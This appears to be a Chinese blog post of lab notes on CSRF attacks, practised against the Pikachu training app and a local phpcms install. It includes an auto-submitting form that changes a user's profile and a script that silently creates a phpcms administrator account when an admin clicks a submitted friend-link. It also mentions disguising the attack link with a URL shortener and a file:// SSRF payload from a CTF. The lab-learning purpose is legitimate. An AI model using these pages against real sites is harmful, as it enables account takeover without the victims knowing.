CSRF

CSRF(get)

caichuanqi网站

CSRF——CSRF(get)——修改信息

复制地址——放到https://tool.chinaz.com/tools/dwz.aspx生成器(短链接)

CSRF(post)

D:\phpStudy\PHPTutorial\WWW\pikachu\pikachu\vul\csrf\csrfpost下新建html文件

内容:

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="123456789" />
    <input id="add" type="text" name="add" value="hubei" />
    <input id="email" type="text" name="email" value="lucy@163.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

访问http://127.0.0.1/Pikachu/Pikachu/vul/csrf/csrfpost/1.html

 

http://51eb0391-61a0-4ca4-aa65-47c9c41e0b78.challenge.ctf.show/

url=file:var/html/www/flag.php

select模块——过滤注入

phpcms

安装,全新安装,管理员登录

设置,管理员管理,添加,抓包代理,用户名hhh——成功,有漏洞

D:\phpStudy\PHPTutorial\WWW\phpcms\install_package新建1.php文件

<!DOCTYPE html>
<html>
 <head>
  <meta charset="utf-8">
  <title>phpcms csrf 加管理</title>
  <script type="text/javascript">
  gum = function(){
    var u = {
       'version':'1140213',
      'domain':'{{domain}}',
      'backinfo':{},
      'author': 'https://github.com/quininer/gum'
   };
    u.e = function(code){try{return eval(code)}catch(e){return ''}};
    u.name = function(names){
      return document.getElementsByTagName(names);
   };
    u.html = function(){
        return u.name('html')[0]
            ||document.write('<html>')
            ||u.name('html')[0];
   };
    u.addom = function(html, doming, hide){
     (!doming)&&(doming = u.html());
      var temp = document.createElement('span');
      temp.innerHTML = html;
      var doms = temp.children[0];
     (hide)&&(doms.style.display = 'none');
      doming.appendChild(doms);
      return doms;
   };
    u.post = function(url, data){
      var form = u.addom("<form method='POST'>", u.html(), true);
      form.action = url;
      for(var name in data){
        var input = document.createElement('input');
        input.name = name;
        input.value = data[name];
        form.appendChild(input);
     };
      form.submit();
   };
  return u;
}();
var timestamp = (Date.parse(new Date())) / 1000;
gum.post('http://127.0.0.1/phpcms/install_package/index.php?m=admin&c=admin_manage&a=add', {
  'info[username]': 'test_' + timestamp,
  'info[password]': '123123',
  'info[pwdconfirm]': '123123',
  'info[email]': '123@qq.com',
  'info[realname]': '',
  'info[roleid]': '1',
  'dosubmit': '提交',
  'pc_hash': '<?php echo $_GET['pc_hash']; ?>'
});
  </script>
 </head>
 <body>
 </body>
</html>

新建用户,1.php网址编辑为http://127.0.0.1/phpcms/install_package/index.php?m=admin&c=admin_manage&a=add

访问首页http://127.0.0.1/phpcms/install_package/index.php

申请友链,地址http://127.0.0.1/phpcms/install_package/1.php

模块友链点击触发

管理员设置添加成功

 

posted @ 2022-03-10 20:37  檐下月  阅读(101)  评论(0)    收藏  举报